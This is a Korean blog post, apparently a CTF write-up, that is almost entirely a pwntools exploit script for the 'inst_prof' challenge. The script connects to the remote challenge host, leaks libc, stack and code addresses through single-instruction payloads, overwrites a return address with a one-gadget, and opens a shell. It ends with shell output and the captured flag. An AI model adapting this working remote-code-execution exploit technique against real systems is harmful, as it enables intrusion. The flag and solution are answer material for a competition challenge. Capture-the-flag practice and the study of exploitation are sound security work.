from pwn import *

pad=lambda x:x.ljust(4,'\x90')
asm_=lambda x:asm(x,arch='amd64')
#r=process('./inst_prof')
r=remote('inst-prof.ctfcompetition.com',1337)
r.recvuntil('ready\n')
#raw_input()
p1=asm("add r12,rbx", arch = 'amd64')
p2=asm("add r12,rsp",arch='amd64')
p3=asm('add r12,QWORD PTR [rsp]',arch='amd64')
p4=asm('mov r14,QWORD PTR [rsp]',arch='amd64')
p5=asm('mov r14w,dx',arch='amd64')
p6=asm('inc r14',arch='amd64')
p7=asm('mov r14b,0x58',arch='amd64')

print len(p1)
r.send(p1+'\x90')
#raw_input()
libc=0x10000000000000000-u64(r.recv(8))
libc=libc/0x1000 - 0x5eafff+0x4000#+1
if libc%16 !=0:
	libc+=1
print hex(libc)
print len(p2)
r.send(pad(p2))
leak=u64(r.recv(8))
leak=0x10000000000000000-leak
leak=leak/0x1000
if leak%16==6:
	leak+=1
print hex(leak)
stack_obj=leak+1+0x70#+1
#raw_input('>')
r.send(pad(p3))
leak=u64(r.recv(8))
leak=0x10000000000000000-leak
leak=leak/0x1000
code=leak-0xb17#+1
if code%16 !=0:
	code+=1
print hex(code)
extra=code%0x10000
extra=extra/0x1000
print extra
r.send(pad(p4)+pad(p5)+pad(p6)*(0x202+extra)+pad(p7))
r.recv(8*(3+0x202+extra))
onegadget=libc+0xe9f2d
#onegadget=libc+0xf0567
print hex(onegadget)
raw_input('>')
for i in range(6):
	p8=asm('mov BYTE PTR [r14], {}'.format('0x'+hex(onegadget)[-2:]),arch='amd64')
	onegadget=onegadget/0x100
	r.send(pad(p8))
	r.send(pad(asm('mov r14b, {}'.format(hex(0x59+i)),arch='amd64')))
	r.recv(8)
#r.interactive()

p10=asm('mov r14,rsp',arch='amd64')
r.send(pad(p10))
raw_input('?')
p11=asm_('mov r14b,{}'.format(hex(stack_obj%0x100)))
r.send(pad(p11))
#r.send(p5) #p5=asm('mov r14w,dx',arch='amd64')
raw_input('>>')
for i in range(8):
	p8=asm('mov BYTE PTR [r14], 0',arch='amd64')
	r.send(pad(p8))
	print stack_obj%100+i+1
	r.send(pad(asm('mov r14b, {}'.format(hex(stack_obj%0x100+i+1)),arch='amd64')))

p9=asm('mov BYTE PTR [rsp],0x54',arch='amd64')
raw_input('>>>>')


r.send(p9)

r.interactive()










8번쨰로 푸러따 의도한 풀이는 아닌 것같다.

다른 문제에서 라이브러리를 가져와서 쉘을 땄다 ㅠ\ 


00\x00$ id

uid=1337(user) gid=1337(user) groups=1337(user)

$ ls

flag.txt

inst_prof

$ cat flag.txt

CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}

'CTF' 카테고리의 다른 글

[H3XOR]column test  (0) 2017.08.02
[codegate2017]VM  (0) 2017.07.25
[0ctf qual]EasiestPrintf  (0) 2017.05.25
[codegate 17 final]BMP  (0) 2017.05.14
[defcon prequal 2017]magic  (0) 2017.05.12

+ Recent posts

티스토리툴바